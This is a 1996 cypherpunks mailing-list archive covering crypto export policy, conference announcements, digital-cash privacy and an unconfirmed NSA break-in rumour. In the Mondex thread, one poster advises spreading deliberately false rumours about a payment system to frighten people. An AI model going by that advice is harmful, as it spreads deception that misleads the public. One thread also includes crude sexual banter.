
http://dimacs.rutgers.edu/Workshops/Threats/index.html

Seems like its shaping up to be a fun workshop.

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 29 Oct 1996 00:01:41 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: FDA_dis
In-Reply-To: <1.5.4.32.19961028162547.006a4b74@pop.pipeline.com>
Message-ID: <Pine.SUN.3.91.961029005904.23020C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I'll have to reread John's piece tomorrow (I'm on vacation right now), but
it doesn't surprise me. He and I have been arguing about this topic via
email for the last week or so. He takes the traditional liberal view of 
government regulation of drugs is necessary; I take the more libertarian one.

The Cato Institute, BTW, will be putting together a roundtable on this soon.

-Declan


On Mon, 28 Oct 1996, John Young wrote:

> 10-28-96. WaPo:
> 
> Dissing Declan's Hotwired slam of the FDA conference on 
> regulating Internet advertising and promotion: "Ultimately, 
> this debate isn't about speech. It comes down to how much 
> regulation we want."
> 
> Declan, singe dis negro inquisto, si?
> 
> -----
> 
> http://jya.com/fdadis.txt
> 
> ftp://jya.com/pub/incoming/fdadis.txt
> 
> FDA_dis
> 
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Tue, 29 Oct 1996 00:23:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <3274B5A7.2781@dcs.ex.ac.uk>
Message-ID: <Pine.HPP.3.91.961029010401.17479B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 28 Oct 1996, R.J.Blakemore wrote:

> As for the Bank, they get details on the item the student has purchased,
> purchase location (the building and exact 'Mondex point' in the bar/shop
> where the transaction took place), the exact time and date the
> transaction was carried out, together with (obviously) the name and ID
> of the purchaser, etc.

And you all accept this without complaining? (Not you personally,
since you obviously are complaining, at least on this list.)
Aren't students supposed to be rebellious?

> As far as the card is concerned, we need it to enter all of our student
> facilities.  Without the card, you can't play sports in the sports hall,
> or get into many Univerity social events.  I think we will even be able
> to use the card to electronically vote.

Well, then don't go to the sports hall or any social events.
Pay for the beer with cash even if it costs a few pennies more.
And, for Godzilla's sake, don't vote (it won't make any difference
anyway).

Open your own, competing services just outside campus limits.

Try to discredit the system. Spread (false, if so be it)
rumours about the selling of beer-drinking records to future
employers, about you knowing a guy who's father, a devote
Latter Day Saint working in the security department of a bank,
spanked the guy for his outrageous social activities, about
the guy who got unfriendly with a 'hacker' and suddenly ran
a bill for 2000 beers in a week, and so on. Yes, especially
stories about fraud and personal loss of money are good. Such
things scare people.


Asgaard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: barrensj@gate.net
Date: Thu, 31 Oct 1996 01:04:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Abducted by Aliens??
In-Reply-To: <v01510100ae92afccffa1@[128.183.238.71]>
Message-ID: <N.102896.221957.52@stpfl1-52.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


You Little Cutie, You --

All right already!  What about choice Z?  I waited so long to respond to the 
joke (which I went around telling everyone) I got embarrassed.  The longer I 
waited, the more stuff happened so that I just couldn't catch up and tell all.  
What about that one????

Actually nothing is happening (oh, except for St. Pete burning last Thursday 
night) but we manage to stay frenetically busy. Teaching dance -- the kids -- 
doing my mother/wife/housewife/daughter/friend/neighbor duties.

I'm very, very sorry to hear about your mother's illness.  My friend/neighbor 
just told me she's been diagnosed with depression and is having a difficult 
time overcoming the stigma.  There's a pile of ignorance out there.  I'm sure 
you're aware that chronic illness and injury can take down whole families.  
How's your dad holding up?  It sounds selfish, but I hope you're taking care of 
yourself.  It's particularly difficult when you live so nearby except that when 
something is wrong and you're not there it's somehow worse.

Also, too bad about your heavy work load. On the other hand, I'm glad you still 
have your job.  I was also particularly happy to hear that The Equine is 
feeling frisky again.

This business about JP is so weird.  I wish he were normal and you two could be 
friends. But it just seems like. . . like . .. ?????  I mean, what would it 
hurt 'im?  It's just BIZARRE!  And I absolutely think it's NOT you!  I mean, 
aren't we all civilized adults here?

You'll be glad to know that we finally got Hannah a pet:  Mexican jumping 
beans.  She's named them Rosie, Rosie and Rosie.  (You think we're REAL mean, 
huh?)  Well, they ARE low maintenance!

I hope you got the cc: of the message I sent Kika over the weekend.  It had a 
short update of sorts on our condition which is, "Can't complain."

So . . . I DO still love you.  You are still a good friend for putting up with 
me.

Love,

Ruth





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pclow <pclow@pc.jaring.my>
Date: Mon, 28 Oct 1996 04:17:09 -0800 (PST)
To: pgut001@cs.auckland.ac.nz
Subject: Re: Secure Internet-based Electronic Commerce: The View from Outside the US
In-Reply-To: <84648715026895@cs26.cs.auckland.ac.nz>
Message-ID: <96Oct28.201940gmt+0800.21890@portal.extol.com.my>
MIME-Version: 1.0
Content-Type: text/plain


pgut001@cs.auckland.ac.nz wrote:
 draft copy of this paper available for comment as
> http://www.cs.auckland.ac.nz/~pgut01/paper.htm, a copy of the introduction is
> given below.  The whole thing is around 170K long (40 A4 pages when printed).
> If anyone has any comments to make on it, please let me know.


Only 1 comment :

> 404 Not Found
> 
> The requested URL /~pgut001/paper.htm was not found on this server. 


Res Ipsa Loquiter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 29 Oct 1996 07:51:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Japan tightens crypto export restrictions, from The Netly News
Message-ID: <Pine.GSO.3.95.961029074934.17345M-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





The Netly News
http://www.netlynews.com/
October 29, 1996

The Japan Factor
By Declan McCullagh (declan@well.com)

       In a move designed to stem the global availability of products
   that use strong encryption technology, Japan last month succumbed to
   U.S. pressure and dramatically tightened its export restrictions, The
   Netly News has learned.
   
       The restrictions amount to a stranglehold. Officials from Japan's
   Ministry of International Trade and Industry (MITI) characterize the
   shift as a very small change, but the new rules require businesses to
   seek prior government approval for any overseas crypto-order that
   totals more than 50,000 yen, or about $450. The previous limit was 10
   million yen, around $91,000.
   
       "We made a very small change of the licensing exception of limited
   value," says Jun Takashina, the deputy director of the Security Export
   Control Division at MITI. Takashina denied that the U.S. pressured
   Japan. "It's our decision. We didn't have any pressure from the United
   States."
   
       Japan says its regulations are designed to codify the "Wassenaar
   Arrangement" on export controls for armaments and advanced technology,
   which was crafted over a two-year period to replace the Cold War-era
   COCOM treaty and was signed in July by over 30 countries. "In the
   Wassenaar Arrangement, we have consensus to cooperate -- not
   coordinate, but cooperate," Takashina said. "In this sense we
   influence each other. We cooperate in our regulations to achieve the
   same purpose." In implementing the agreement, Japan relaxed controls
   on many products -- and, tellingly, only tightened the regulation of
   encryption. However, other countries that signed the agreement have
   not done the same.
   
       Japan's move follows a hot summer of even hotter debate on Capitol
   Hill, where Justice Department officials claimed that criminals use
   PGP to scramble files and software company executives testified that
   current regs cost U.S. industry millions.
   
       Boosting the political temperature further was RSA Data Security's
   announcement in June that NTT and RSA's Japanese affiliate were ready
   to ship a triple-DES chip more secure than anything U.S. manufacturers
   are permitted to sell overseas. Privacy advocates quickly heralded it
   as exposing the fatal flaws in the Clinton administration's
   regulations. Phil Zimmermann, inventor of PGP, told me at the time
   that "the Japanese took over the American television manufacturing
   industry" and are poised to take over this one unless Congress
   approves the Pro-CODE bill.
   
       This widely-publicized announcement almost certainly prompted
   Japan's new crypto-muzzling decision. The company's president, Jim
   Bidzos, says that Tokyo has started to "look a little closer" at its
   encryption policies. "With all the press about NTT chips and whatnot
   in Japan, the U.S. government is going to try to stem the flow." (One
   White House scheme designed to do just that is the
   soon-to-be-announced creation of an ambassador-level position whose
   sole job will be to marshal international support for U.S. crypto
   policy.)
   
       Stewart Baker, former NSA general counsel, calls Japan's move a
   sign that the country's leaders are awakening to -- and are sensitive
   to -- the U.S. government's position. "This is a signal that they did
   not want to be at the center of the policy debate over export controls
   if they could avoid it," he says.
   
       "As [the policy] gets covered in the New York Times on the front
   page, the Japanese government focuses more attention.... This is a
   reflection of concern that that kind of story is not good for Japan,"
   says Baker, who recently wrote about Japan's stance on encryption in
   Wired.
   
       The key question, though, is how strictly will Japan enforce the
   new regulations? The Wassenaar Arrangement is designed to keep arms
   and technology out of the hands of rogue countries, but companies in
   Silicon Valley already are complaining that Japanese shipments of
   data-scrambling hardware are being delayed. And the fine print of the
   new Japanese regs seems to require the end user's name and address --
   which is impossible for U.S. distributors to provide.
   
       I think Marc Rotenberg, director of the Electronic Privacy
   Information Center and international crypto-watcher, has it right.
   Today he said to me that U.S. crypto isn't our biggest export in this
   area; instead, it's U.S. crypto policy. I agree -- and I say that's
   where we need more government intervention. Any government employee or
   erstwhile crypto-czar who wants to export a dumb crypto policy should
   be required to say why it should be allowed to infect other countries.
   I'm sure Japan won't mind.
   
   -- By Declan McCullagh (declan@well.com)
      with reporting by K. N. Cukier (100736.3602@compuserve.com)

Wassenaar Arrangement:
 http://www.dfat.gov.au/dfat/dept/isd/peace_and_disarmament/pd_4_96/pd10.html

RSA announces NTT chip:
 http://www.eff.org/pub/Publications/Declan_McCullagh/cwd.got.away.0696.article

U.S. to create crypto-ambassador:
 http://www.netizen.com/netizen/96/43/index3a.html

Stewart Baker on Japan's crypto-politics:
 http://www.hotwired.com/wired/4.09/es.crypto.html

Marc Rotenberg on OECD crypto-politics:
 http://www2.eff.org/~declan/global/japan/rotenberg.reply.102896

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 29 Oct 1996 05:50:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: German Draft Digital Sigature Law
Message-ID: <v03007813ae9bb888e152@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date:         Tue, 29 Oct 1996 02:06:50 EST
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Christopher Kuner <100442.3075@COMPUSERVE.COM>
Subject:      German Draft Digital Sigature Law
To: CYBERIA-L@LISTSERV.AOL.COM

For your information, my translation of the German Draft Digital Signature law
is now available on my homepage "Law of Electronic and Internet Commerce in
Germany" (http://ourworld.compuserve.com/homepages/ckuner).

Christopher Kuner, Esq.
Gleiss & Partners
Gaertnerweg 2
60322 Frankfurt, Germany
tel. 49-69-955140
fax 49-69-95514198
e-mail 100442.3075@compuserve.com

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Tue, 29 Oct 1996 06:23:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Nations Bank Visa scam/error
Message-ID: <Pine.GSO.3.95.961029092159.23077A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

This may be off topic or then again it may not be.

A friend paid his balance and cancelled his Nations Bank Visa card 
about 6 months ago.  A couple of days ago, he received a bill from
Nations Bank for a *recent* charge, which the indicated vendor denies 
submitting.

My friend has been trying for two days to get through to Nations Bank
on its customer service line, to no avail.  He keeps getting a "due to
heavy calling volume our queue is full" message.

Anybody know who screwed up how?

bd

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmT3y680j2q8tTgtAQGC7wQA2ris5C3KAD6qLy3AmtglJRoZrei72CIH
MEm7DGasD4AXqfwkjdmvZScAVXRD+KHHgVZQKQp+H0+D/TWHZCN9nrwE1z5/j73R
o8qXDCC0owwJabZHknOMwpBm4Sf6JUGs7Wm1K9JmpVlF01GP+z7rxOMXfvZrlxvy
mwcK3wjIPCU=
=PTmz
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 29 Oct 1996 09:27:12 -0800 (PST)
To: Karen Jacobs <jacobs@tfn.com>
Subject: Re: copyright violations
In-Reply-To: <274DF7B0.3038@tfn.com>
Message-ID: <Pine.GSO.3.95.961029092058.12454F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


I do hope that Karen isn't trying a Scientology gambit. Fair use excerpts
of "their material" are protected, no?

-Declan


On Mon, 28 Oct 1996, Karen Jacobs wrote:

>      FYI, American Banker and all sister publications are copyrighted 
>      material.  As such, only very few select third parties have permission 
>      to redistribute our material.  Please notify us immediately of any 
>      third party contacting you with our material so that we may protect 
>      our copyright.  Do not redistribute any information you receive from a 
>      third party.
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Mon, 28 Oct 1996 12:44:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secure Internet-based Electronic Commerce: The View from Outside the US
Message-ID: <84653542728311@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Oops - when I posted the previous announcement I gave the file the .html 
extension out of force of habit, the URL should in fact be 
http://www.cs.auckland.ac.nz/~pgut01/paper.txt (you can also get to it using
the previous URL, but your browser will wrap the text.  To fix this, either
load it as text or use the .txt URL).

Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jch@vdsi.com (Haggard, John C.)
Date: Tue, 29 Oct 1996 07:48:58 -0800 (PST)
To: coderpunks@toad.com
Subject: [Fwd: Re: Looking for Cryptographic Expert who Knows SSL]
Message-ID: <3276272A.75FA@vdsi.com>
MIME-Version: 1.0
Content-Type: message/rfc822


To: jch@vdsi.com (Haggard, John C.)
Subject: Re: Looking for Cryptographic Expert who Knows SSL
From: Adam Shostack <adam@homeport.org>
Date: Tue, 29 Oct 1996 10:31:49 -0500 (EST)
In-Reply-To: <327620C3.305@vdsi.com> from "Haggard, John C." at "Oct 29, 96 09:20:35 am"

Could I suggest you send this to cypherpunks@toad.com &
coderpunks@toad.com?

There may be interested parties there.

Adam



Haggard, John C. wrote:
[Charset iso-8859-1 unsupported, filtering to ASCII...]
| Hello to all,
| 
| I've been following this group for some time now and I have to say that
| I'm very impressed with the group. Our company, VASCO Data Security,
| Inc. (VDSI) is in the business of providing cryptographic chip sets and
| boards (see http://www.lintel.com. Lintel is a wholly owned subsidiary.)
| 
| I'm looking for individuals who can assist us with feasibility studies
| for building DES/RSA encryption accelerator boards for servers. We have
| EE_s who fully understand our chip set and boards, however we need
| software engineers who understand SSL.
| 
| If anyone is interested, please drop me a note. 
| 
| Thanks
| 
| John Haggard
| President
| VASCO Data Security, Inc.
| 1919 S. Highland Ave.
| Suite 118-C
| Lombard, IL 60148
| 630-932-8844
| 630-495-0279 (fax)
| jch@vdsi.com
| http://www.vdsi.com
| 


-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Newman <troll@sug.org>
Date: Tue, 29 Oct 1996 09:08:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anyone going to "Computers & The Law III"?
Message-ID: <199610291710.MAA05599@dnsmain.sug.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

I'm Alex Newman, on of the conference organizers for "Computers & The
Law III", Dec 1-4, 1996 in San Jose, CA.  The theme this year is
"Assessing the Internet Threat".  I was wondering if there was anyone
in the San Francisco/Silicon Valley area who was going to be there who
wanted to sit on a panel about the CDA.

Drop me a line if your interested.  If you just want more information
about the conference, take a look at www.sug.org/CL3 or send mail to
conference@sug.org

--a

Alexander Newman	Sun User Group		
troll@sug.org		1330 Beacon St.,	Remember, to die with honor
(617) 232-0514 voice	Suite #344		...you still have to die.
(617) 232-1347 fax 	Brookline, MA 02146 	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Tue, 29 Oct 1996 09:17:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Rumours of NSA breakin
Message-ID: <9610291723.AA05462@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	I've been hearing rumours of an alledged compromise
of the NSA Web server but no hard evidence. The claim made is
that several Mb of files were downloaded from the server and
posted to the "Internet". I can't see it in sci.crypt or 
alt.conspiracy though.

	I am more than a little skeptical of the claim, unless the
files in question were not considered sensitive - and there is
no reason to believe that the NSA would be keeing anything
secret on their Web server. Banks do not keep money stuffed under
mattresses and the NSA does not keep secrets on Internet servers.

	The origin of the rumour may be an "observation" that
the DOJ hack was on the 19th August, the CIA one on the 19th
of September. It is no secret that several sites were watching
out for attacks on the 19th October.

	Has anyone heard anything more than a rumour of this
alledged event?


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 29 Oct 1996 12:28:49 -0800 (PST)
To: cypherpunks
Subject: Fortezza web site in Huntsville
Message-ID: <199610292028.MAA11182@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out http://www.armadillo.huntsville.al.us.  Bonus points for the first
people to identify who actually runs the site.

	John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 29 Oct 1996 12:03:41 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: How do you spell "Internet"? T-H-R-E-A-T
In-Reply-To: <199610290435.XAA11932@homeport.org>
Message-ID: <v03007801ae9c221ad764@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I notice two conference announcements this morning, both focussed on the
Internet as a _threat_. While the conference organizers no doubt don't mean
to play into the hands of the Administration's self-serving scaremongering
about the Four Horsemen, it _is_ interesting that the focus of more and
more attention is on threats to the Internet. (And a possible subtext of
threats _by_ the Internet.)

Here are the two announcements:

At 11:35 PM -0500 10/28/96, Adam Shostack wrote:
>Anyone else planning to go to the DIMACS workshop on network threats?
>December 4-6 at Rutgers.
>
>http://dimacs.rutgers.edu/Workshops/Threats/index.html
>
>Seems like its shaping up to be a fun workshop.

and then this:

At 12:10 PM -0500 10/29/96, Alex Newman wrote:
>Hi all,
>
>I'm Alex Newman, on of the conference organizers for "Computers & The
>Law III", Dec 1-4, 1996 in San Jose, CA.  The theme this year is
>"Assessing the Internet Threat".  I was wondering if there was anyone
>in the San Francisco/Silicon Valley area who was going to be there who
>wanted to sit on a panel about the CDA.

I assume the Rutgers conference is more about the threats _to_ the
Internet, and that the "Assessing the Internet Threat" is more about the
Four Horsemen, pedophiles, decency, V-Chips, key escrow, export
restrictions, import bans, zero tolerance for crypto abusers, and all that
Big Brother stuff.

If my theory is right, that the Internet is increasingly being portrayed
(by some journalists, by many politicians, and by conferences) as a scary
place that needs to be regulated and policed, expect our various friends
and families to ask us about the "dangers" of the Net.

Creating a sense of fear is always the first step.

--Tim May





"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lawrence.Hughes@Software.com (Lawrence Hughes)
Date: Tue, 29 Oct 1996 14:34:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: First Union Ahead of Curve with Sun's "JavaStation"
Message-ID: <3.0b26.32.19961029143328.00a26b30@pop-sb.software.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 AM 10/28/96 -0800, you wrote:
>When Sun Microsystems unveils today what it is touting as a radical advance 
>in business computing, First Union Corp. will be in the vanguard of those 
>adopting it.

Dunno - sounds to me like an act of desperation that is at least 99.44%
hype, from a company that has refused to acknowledge that the UNIX
market is crashing even as we speak. While I was Intergraph HQ in
1989-1993, we saw projections of that coming demise from IDC, etc.
Which had a lot to do with the big switch there to Intel/NT. 

Especially love the way they don't figure the price of any of those
"fat $ervers" (from guess what California company) into the overall
costs.... seems to be mostly a way to dupe folks into shifting funds
from all those wonderful, independence granting PCs into paying for
it-was-good-enough-for-my-dad-it's-good-enough-for-me big iron at
the center, with dumb terminals (no matter what you call 'em) tethered
to it. And $1500 is a lot for a dumb terminal.

And that dazzling array of nearly 500 craplets.. I mean Java apps...
that's sure a lot of eye candy, but I'd hate to try to run a business
with them.

Get real. No one, including a badly aging Sun, will ever put the
distributed computing genie back in the "glass house" bottle that
PC's allowed us to escape from DECADES ago. 





 Lawrence E. Hughes                      Software.com, Inc.
 Principal Software Engineer             525 Anacapa Street
 Email: Lawrence.Hughes@Software.com     Santa Barbara 93101
 805-882-2470 x259 Fax: 805-882-2473     People's Republic of California

www.software.com - purveyors of fine Internet Infrastructure to the trade

"Those who would order the life of their nation must first set about ordering
their home life" - Kung Fu Tse (Confucius), roughly 500 BC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apache <apache@quux.apana.org.au>
Date: Mon, 28 Oct 1996 20:37:48 -0800 (PST)
To: pclow <pclow@pc.jaring.my>
Subject: Re: Secure Internet-based Electronic Commerce: The View from Outside the US
In-Reply-To: <96Oct28.201940gmt+0800.21890@portal.extol.com.my>
Message-ID: <Pine.LNX.3.91.961029150245.29239B-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Oct 1996, pclow wrote:

> pgut001@cs.auckland.ac.nz wrote:
>  draft copy of this paper available for comment as
> > http://www.cs.auckland.ac.nz/~pgut01/paper.htm, a copy of the introduction is
> > given below.  The whole thing is around 170K long (40 A4 pages when printed).
> > If anyone has any comments to make on it, please let me know.
> 
> 
> Only 1 comment :
> 
> > 404 Not Found
> > 
> > The requested URL /~pgut001/paper.htm was not found on this server. 
> 
> 
> Res Ipsa Loquiter

I had no trouble obtaining a copy. Its worth another attempt in my 
opinion; it's a superb article. 


-- 
   .////.   .//                                 apache@quux.apana.org.au
 o:::::::::///                         
>::::::::::\\\     Finger me for PGP PUBKEY           Brisbane AUSTRALIA
   '\\\\\'   \\    <A HREF="http://quux.apana.org.au/~apache/"> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marcus.Goncalves@mars.process.com (Goncalves, Marcus)
Date: Tue, 29 Oct 1996 12:19:52 -0800 (PST)
To: cypherpunks@toad.com')
Subject: **Call for Authors**
Message-ID: <1996Oct29.151700.1063.565535@mars.process.com>
MIME-Version: 1.0
Content-Type: text/plain



Publisher is seeking authors in the areas of Internet, Web security,   
networking and emerging technologies.  If you have a book idea, an   
outline and a conviction about it, please let me know.  All submissions   
will be considered.

Send e-mail to mg@manning.com or goncalvesv@aol.com.  We'll reply   
quickly.


_____________________________________________________
M. Goncalves, Editor - mg@manning.com
Manning Publications Co., 3 Lewis Street, Greenwich, CT 06830
508-460-8084, fax 508-460-8085
http://www.browsebooks.com, http://www.spindoczine.com
_____________________________________________________  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Edwards <SAlanEd@concentric.net>
Date: Tue, 29 Oct 1996 13:53:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sex, drugs, and libertarianism
Message-ID: <1.5.4.32.19961029215453.0069cc98@pop3.concentric.net>
MIME-Version: 1.0
Content-Type: text/plain


This isn't about crypto but since cypherpunks is the most interesting
libertarian forum I know, I thought I'd throw it out.

I live in a sort of urban pioneer zone, a historical district in Nashville
wedged between low income housing projects.  We have an interesting mix of
people here, black, white, asian, redneck, yuppies, country star wannabes,
drug addicts etc.
I was walking back from the convenience store the other day, when I began
talking to a young lady.  She offered to give me a blow job for $2.  I don't
patronize prostitutes, less from moral concerns, than from concerns for my
health and safety.  Nonetheless, $2 for a blow job says to me that the
market for sex acts has hit rock bottom.  Forthrightly, she told me she
wanted the money for crack, which has also become very cheap here.

It has been said many times in this forum that prostitution and drugs are
victimless crimes.  Is this really so?  Although I am generally in concert
with libertarian views, I would say that the young lady I talked to was
definitely a victim.  Also, if we are a society, rather than fortress-like
individuals, we should be concerned with the inevitable spread of disease
and insanity that is the result of "victimless" crimes.

On a similar note, I read an interesting article that connected the recent
drop in the crime rate to the rather startling increase in drug use among
young people. The claim that was made is that drugs have become so cheap
that people don't have to steal as much to buy them.  Based on the evidence
of the $2 blow job, I'm inclined to believe it. 
 

SAlanEd@concentric.net, SAlanEd@aol.com,
http://users.aol.com/salaned/cyberplace.html

"Life, he himself said once, (his biografiend, in fact, kills him verysoon,
if yet not, after) is a wake, livit or krikit, and on the bunk of our
breadwinning, lies the cropse of our seedfather..."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 29 Oct 1996 14:20:44 -0800 (PST)
To: hallam@ai.mit.edu
Subject: [NOISE][no-cripto-here]Re: Rumours of NSA breakin
In-Reply-To: <9610291723.AA05462@etna.ai.mit.edu>
Message-ID: <Pine.BSF.3.91.961029155328.15195B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 29 Oct 1996 hallam@ai.mit.edu wrote:

> 
> Hi,
> 
> 	I've been hearing rumours of an alledged compromise
> of the NSA Web server but no hard evidence. The claim made is
> that several Mb of files were downloaded from the server and
> posted to the "Internet". I can't see it in sci.crypt or 
> alt.conspiracy though.

I have not heard this one, though every damn mailing list I'm on has 
people posting messages about "web servers being hacked" on a daily 
basis. Most of these have turned out to be "spoof" sites, like "nasa.com" 
instead of "nasa.gov." Big deal. Some nut even started posting the url to 
his "hacked nasa.com mirror site." Free advertising for a group that 
registers piles of domain names, and re-sells them.

I've set up a number of networks for gubmint agencies, and all but one of
these put their web servers on a completely different network with its own
feed to a commercial ISP, and no other link to any internal agency
network. If you look at the address range assigned to the web server,
you'll see that it falls within a commercial CIDR block and isn't part of
the gubmint agency's usual range. Many use "co-locate" sites AT an ISP,
and contract out the web server - it isn't on the agency network OR the
agency premesis.

If anyone does compromise the site, they won't get any proprietary info, 
can't use the systems to attack other "trusted" systems, etc. About all 
they do is prove the agency hired a less-than-thorough contractor to run 
the web system.

I would not be too concerned about threats to "National Security" 
regarding this alleged "incident."

In my experience, most of the agencies putting up web servers are fairly 
security aware and capable. The holes are generally elsewhere, on legacy 
systems set up ages ago, located at under-staffed locations still 
using systems installed and maintained by someone who retired (or died) 
years ago.

Just my $.02.

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 29 Oct 1996 15:38:22 -0800 (PST)
To: Steve Edwards <SAlanEd@concentric.net>
Subject: Re: Sex, drugs, and libertarianism
In-Reply-To: <1.5.4.32.19961029215453.0069cc98@pop3.concentric.net>
Message-ID: <Pine.SUN.3.91.961029161111.9601A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 29 Oct 1996, Steve Edwards wrote:

> I was walking back from the convenience store the other day, when I began
> talking to a young lady.  She offered to give me a blow job for $2.  I don't
> patronize prostitutes, less from moral concerns, than from concerns for my
> health and safety.  Nonetheless, $2 for a blow job says to me that the
> market for sex acts has hit rock bottom.  Forthrightly, she told me she
> wanted the money for crack, which has also become very cheap here.
> 
> It has been said many times in this forum that prostitution and drugs are
> victimless crimes.  Is this really so?  Although I am generally in concert
> with libertarian views, I would say that the young lady I talked to was
> definitely a victim...

Yes, the young lady is a victim, but not of prostitution or
drugs.  I leave it as an exercise to the reader to determine of
whom the young lady is a victim.


 S a n d y

P.S.	Now where is it, EXACTLY, that these $2 blow jobs
	are being offered? 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cynthia Deno <cynthia@usenix.ORG>
Date: Tue, 29 Oct 1996 15:18:10 -0800 (PST)
To: urexx-l@liverpool.ac.uk
Subject: USENIX Annual Conference & USELINUX, January 6-10, 1997
Message-ID: <199610292317.QAA26468@usenix.ORG>
MIME-Version: 1.0
Content-Type: text/plain



January 6-10, 1997
USENIX 1997 TECHNICAL CONFERENCE 
Anaheim, California, Marriott Hotel

USELINUX
Linux Applications Development & Deployment Conference
Co-located with USENIX 1997 Technical Conference
Co-sponsored by Linux International

Attendees may pay one fee and attend both conferences.

There are 20 day-long tutorials offered on January 6-7.  
Topics include:
IPv6                             Kerberos Approach to Network Security
Secure Java Programming            Introduction to Java
Windows NT and Windows 95     UNIX Network Programming
How Networks Work                  Topics in System Administration
Web Security                 System and Network Performance Tuning
Inside the Linux 2.0 Kernel            Java Applets and the AWT
